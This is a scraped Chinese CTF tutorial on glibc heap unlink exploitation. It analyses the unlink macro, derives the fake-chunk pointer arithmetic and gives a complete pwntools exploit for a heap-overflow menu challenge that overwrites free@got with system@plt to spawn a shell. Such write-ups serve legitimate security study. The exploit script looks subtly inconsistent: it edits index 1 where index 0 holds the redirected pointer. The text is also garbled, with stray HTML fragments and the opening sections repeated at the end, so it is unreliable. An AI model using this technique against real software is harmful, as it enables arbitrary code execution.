Pwn堆利用之unlink技术详解<\/h1>

1. 什么是unlink<\/h2>
unlink是glibc堆管理中的一个重要操作，用于将空闲的chunk从双向链表中移除。攻击者可以通过伪造chunk的元数据，利用unlink操作实现任意地址写，从而控制程序执行流程。<\/p>

2. unlink源码分析<\/h2>
#define unlink(AV, P, BK, FD) { 
<\/span><\/span><\/span><\/span>    FD =<\/span> P-><\/span>fd; 
<\/span><\/span>    BK =<\/span> P-><\/span>bk; 
<\/span><\/span>    if<\/span> (__builtin_expect(FD-><\/span>bk !=<\/span> P ||<\/span> BK-><\/span>fd !=<\/span> P, 0<\/span>)) 
<\/span><\/span>        malloc_printerr(check_action, "corrupted double-linked list"<\/span>, P, AV); 
<\/span><\/span>    else<\/span> { 
<\/span><\/span>        FD-><\/span>bk =<\/span> BK; 
<\/span><\/span>        BK-><\/span>fd =<\/span> FD; 
<\/span><\/span>        if<\/span> (!<\/span>in_smallbin_range(P-><\/span>size) &&<\/span> __builtin_expect(P-><\/span>fd_nextsize !=<\/span> NULL, 0<\/span>)) { 
<\/span><\/span>            if<\/span> (__builtin_expect(P-><\/span>fd_nextsize-><\/span>bk_nextsize !=<\/span> P, 0<\/span>) ||<\/span> 
<\/span><\/span>                __builtin_expect(P-><\/span>bk_nextsize-><\/span>fd_nextsize !=<\/span> P, 0<\/span>)) 
<\/span><\/span>                malloc_printerr(check_action, "corrupted double-linked list (not small)"<\/span>, P, AV); 
<\/span><\/span>            if<\/span> (FD-><\/span>fd_nextsize ==<\/span> NULL) { 
<\/span><\/span>                if<\/span> (P-><\/span>fd_nextsize ==<\/span> P) 
<\/span><\/span>                    FD-><\/span>fd_nextsize =<\/span> FD-><\/span>bk_nextsize =<\/span> FD; 
<\/span><\/span>                else<\/span> { 
<\/span><\/span>                    FD-><\/span>fd_nextsize =<\/span> P-><\/span>fd_nextsize; 
<\/span><\/span>                    FD-><\/span>bk_nextsize =<\/span> P-><\/span>bk_nextsize; 
<\/span><\/span>                    P-><\/span>fd_nextsize-><\/span>bk_nextsize =<\/span> FD; 
<\/span><\/span>                    P-><\/span>bk_nextsize-><\/span>fd_nextsize =<\/span> FD; 
<\/span><\/span>                } 
<\/span><\/span>            } else<\/span> { 
<\/span><\/span>                P-><\/span>fd_nextsize-><\/span>bk_nextsize =<\/span> P-><\/span>bk_nextsize; 
<\/span><\/span>                P-><\/span>bk_nextsize-><\/span>fd_nextsize =<\/span> P-><\/span>fd_nextsize; 
<\/span><\/span>            } 
<\/span><\/span>        } 
<\/span><\/span>    } 
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键操作解析：<\/h3>


参数说明<\/strong>：<\/p>

AV<\/code>：分配区指针<\/li>
P<\/code>：当前要unlink的chunk<\/li>
BK<\/code>：后一个chunk<\/li>
FD<\/code>：前一个chunk<\/li>
<\/ul>
<\/li>

安全检查<\/strong>：<\/p>
if<\/span> (__builtin_expect(FD-><\/span>bk !=<\/span> P ||<\/span> BK-><\/span>fd !=<\/span> P, 0<\/span>))
<\/span><\/span>    malloc_printerr(check_action, "corrupted double-linked list"<\/span>, P, AV);
<\/span><\/span><\/code><\/pre>检查前一个chunk的bk<\/code>和后一个chunk的fd<\/code>是否都指向当前chunk，防止链表被破坏。<\/p>
<\/li>

unlink操作<\/strong>：<\/p>
FD-><\/span>bk =<\/span> BK;
<\/span><\/span>BK-><\/span>fd =<\/span> FD;
<\/span><\/span><\/code><\/pre>将前一个chunk的bk<\/code>指向后一个chunk，后一个chunk的fd<\/code>指向前一个chunk，完成链表节点的移除。<\/p>
<\/li>
<\/ol>
3. unlink攻击原理<\/h2>
通过伪造一个fake chunk，使得：<\/p>

P->fd->bk == P<\/code><\/li>
P->bk->fd == P<\/code><\/li>
<\/ul>
当这两个条件满足时，unlink操作会执行：<\/p>
*<\/span>(P-><\/span>fd +<\/span> 0x18<\/span>) =<\/span> P-><\/span>bk
<\/span><\/span>*<\/span>(P-><\/span>bk +<\/span> 0x10<\/span>) =<\/span> P-><\/span>fd
<\/span><\/span><\/code><\/pre>如果我们设置：<\/p>

P->fd = target - 0x18<\/code><\/li>
P->bk = target - 0x10<\/code><\/li>
<\/ul>
那么unlink操作将变为：<\/p>
*<\/span>(target -<\/span> 0x18<\/span> +<\/span> 0x18<\/span>) =<\/span> target -<\/span> 0x10<\/span>  =><\/span> *<\/span>target =<\/span> target -<\/span> 0x10<\/span>
<\/span><\/span>*<\/span>(target -<\/span> 0x10<\/span> +<\/span> 0x10<\/span>) =<\/span> target -<\/span> 0x18<\/span>  =><\/span> *<\/span>target =<\/span> target -<\/span> 0x18<\/span>
<\/span><\/span><\/code><\/pre>最终结果是*target = target - 0x18<\/code>，实现了向target地址写入值target - 0x18<\/code>。<\/p>
4. 实际利用步骤<\/h2>
题目分析<\/h3>
题目是一个堆菜单题，具有以下功能：<\/p>

create_heap<\/code>: 创建指定大小的堆块<\/li>
edit_heap<\/code>: 编辑堆块内容，存在堆溢出漏洞<\/li>
delete_heap<\/code>: 释放堆块，指针置零，无UAF<\/li>
l33t<\/code>: 后门函数，调用system("cat \/home\/pwn\/flag")<\/code><\/li>
<\/ul>
利用过程<\/h3>


准备阶段<\/strong>：<\/p>

分配多个chunk，为伪造fake chunk做准备<\/li>
<\/ul>
<\/li>

伪造fake chunk<\/strong>：<\/p>

在某个chunk中构造fake chunk的元数据：
fd =<\/span> target -<\/span> 0x18<\/span>
<\/span><\/span>bk =<\/span> target -<\/span> 0x10<\/span>
<\/span><\/span>payload =<\/span> p64(0<\/span>) +<\/span> p64(0x21<\/span>) +<\/span> p64(fd) +<\/span> p64(bk) +<\/span> p64(0x20<\/span>) +<\/span> p64(next_chunk_size |<\/span> PREV_INUSE)
<\/span><\/span><\/code><\/pre><\/li>
通过edit功能写入伪造的元数据<\/li>
<\/ul>
<\/li>

触发unlink<\/strong>：<\/p>

释放与fake chunk物理相邻的chunk，触发unlink操作<\/li>
此时heaparray<\/code>中的指针会被修改为target - 0x18<\/code><\/li>
<\/ul>
<\/li>

实现任意地址写<\/strong>：<\/p>

通过修改后的heaparray<\/code>指针，可以覆盖free@got<\/code>为system@plt<\/code><\/li>
释放一个包含\/bin\/sh<\/code>的chunk即可获得shell<\/li>
<\/ul>
<\/li>
<\/ol>
完整EXP<\/h3>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context(log_level=<\/span>'debug'<\/span>, os=<\/span>'linux'<\/span>, arch=<\/span>'amd64'<\/span>)
<\/span><\/span>elf =<\/span> ELF('.\/pwn'<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> exploit<\/span>():
<\/span><\/span>    p =<\/span> process('.\/pwn'<\/span>)
<\/span><\/span>    
<\/span><\/span>    def<\/span> add<\/span>(size, content):
<\/span><\/span>        p.<\/span>sendlineafter("Your choice :"<\/span>, "1"<\/span>)
<\/span><\/span>        p.<\/span>sendlineafter("Size of Heap : "<\/span>, str(size))
<\/span><\/span>        p.<\/span>sendafter("Content of heap:"<\/span>, content)
<\/span><\/span>    
<\/span><\/span>    def<\/span> edit<\/span>(idx, size, content):
<\/span><\/span>        p.<\/span>sendlineafter("Your choice :"<\/span>, "2"<\/span>)
<\/span><\/span>        p.<\/span>sendlineafter("Index :"<\/span>, str(idx))
<\/span><\/span>        p.<\/span>sendlineafter("Size of Heap : "<\/span>, str(size))
<\/span><\/span>        p.<\/span>sendafter("Content of heap : "<\/span>, content)
<\/span><\/span>    
<\/span><\/span>    def<\/span> delete<\/span>(idx):
<\/span><\/span>        p.<\/span>sendlineafter("Your choice :"<\/span>, "3"<\/span>)
<\/span><\/span>        p.<\/span>sendlineafter("Index :"<\/span>, str(idx))
<\/span><\/span>    
<\/span><\/span>    # 准备target地址<\/span>
<\/span><\/span>    target =<\/span> 0x6020e0<\/span>  # heaparray地址<\/span>
<\/span><\/span>    fd =<\/span> target -<\/span> 0x18<\/span>
<\/span><\/span>    bk =<\/span> target -<\/span> 0x10<\/span>
<\/span><\/span>    
<\/span><\/span>    # 分配chunk<\/span>
<\/span><\/span>    add(0x20<\/span>, b<\/span>'aaaa'<\/span>)  # 0<\/span>
<\/span><\/span>    add(0x80<\/span>, b<\/span>'bbbb'<\/span>)  # 1<\/span>
<\/span><\/span>    add(0x100<\/span>, b<\/span>'cccc'<\/span>) # 2<\/span>
<\/span><\/span>    add(0x10<\/span>, b<\/span>'\/bin\/sh<\/span>\x00<\/span>'<\/span>) # 3<\/span>
<\/span><\/span>    
<\/span><\/span>    # 伪造fake chunk<\/span>
<\/span><\/span>    payload =<\/span> p64(0<\/span>) +<\/span> p64(0x21<\/span>) +<\/span> p64(fd) +<\/span> p64(bk) +<\/span> p64(0x20<\/span>) +<\/span> p64(0x90<\/span>)
<\/span><\/span>    edit(0<\/span>, len(payload), payload)
<\/span><\/span>    
<\/span><\/span>    # 触发unlink<\/span>
<\/span><\/span>    delete(1<\/span>)
<\/span><\/span>    
<\/span><\/span>    # 重新分配chunk1，此时heaparray[0]指向target-0x18<\/span>
<\/span><\/span>    add(0x20<\/span>, b<\/span>'a'<\/span>)  # 1<\/span>
<\/span><\/span>    
<\/span><\/span>    # 构造payload覆盖free@got<\/span>
<\/span><\/span>    payload =<\/span> b<\/span>'a'<\/span>*<\/span>0x18<\/span> +<\/span> p64(elf.<\/span>got['free'<\/span>])
<\/span><\/span>    edit(0<\/span>, len(payload), payload)
<\/span><\/span>    
<\/span><\/span>    # 将free@got改为system@plt<\/span>
<\/span><\/span>    edit(1<\/span>, 8<\/span>, p64(elf.<\/span>plt['system'<\/span>]))
<\/span><\/span>    
<\/span><\/span>    # 触发free("\/bin\/sh")实际上是system("\/bin\/sh")<\/span>
<\/span><\/span>    delete(3<\/span>)
<\/span><\/span>    
<\/span><\/span>    p.<\/span>interactive()
<\/span><\/span>
<\/span><\/span>exploit()
<\/span><\/span><\/code><\/pre>5. 调试技巧<\/h2>


查看堆布局<\/strong>：<\/p>
pwndbg> vis
<\/span><\/span><\/code><\/pre><\/li>

查看关键内存<\/strong>：<\/p>
pwndbg> x\/40gx 0x6020a0
<\/span><\/span><\/code><\/pre><\/li>

跟踪unlink过程<\/strong>：<\/p>

在free操作前设置断点<\/li>
单步跟踪unlink宏的执行<\/li>
<\/ul>
<\/li>
<\/ol>
6. 防御措施<\/h2>


glibc的安全检查<\/strong>：<\/p>

双向链表完整性检查<\/li>
size字段合法性检查<\/li>
<\/ul>
<\/li>

现代防护<\/strong>：<\/p>

Safe-Linking (glibc 2.32+)<\/li>
更严格的chunk验证<\/li>
<\/ul>
<\/li>
<\/ol>
7. 总结<\/h2>
unlink攻击的核心在于：<\/p>

伪造一个看似合法的fake chunk<\/li>
绕过glibc的双向链表检查<\/li>
利用unlink操作实现任意地址写<\/li>
通过覆盖关键函数指针控制程序流<\/li>
<\/ol>
这种攻击方式在早期glibc版本中较为有效，但随着防护措施的加强，现代系统中需要结合其他漏洞才能实现类似效果。<\/p>
Pwn堆利用之unlink技术详解<\/h1>

1. 什么是unlink<\/h2> unlink是glibc堆管理中的一个重要操作，用于将空闲的chunk从双向链表中移除。攻击者可以通过伪造chunk的元数据，利用unlink操作实现任意地址写，从而控制程序执行流程。<\/p>

1. 什么是unlink<\/h2>
unlink是glibc堆管理中的一个重要操作，用于将空闲的chunk从双向链表中移除。攻击者可以通过伪造chunk的元数据，利用unlink操作实现任意地址写，从而控制程序执行流程。<\/p>
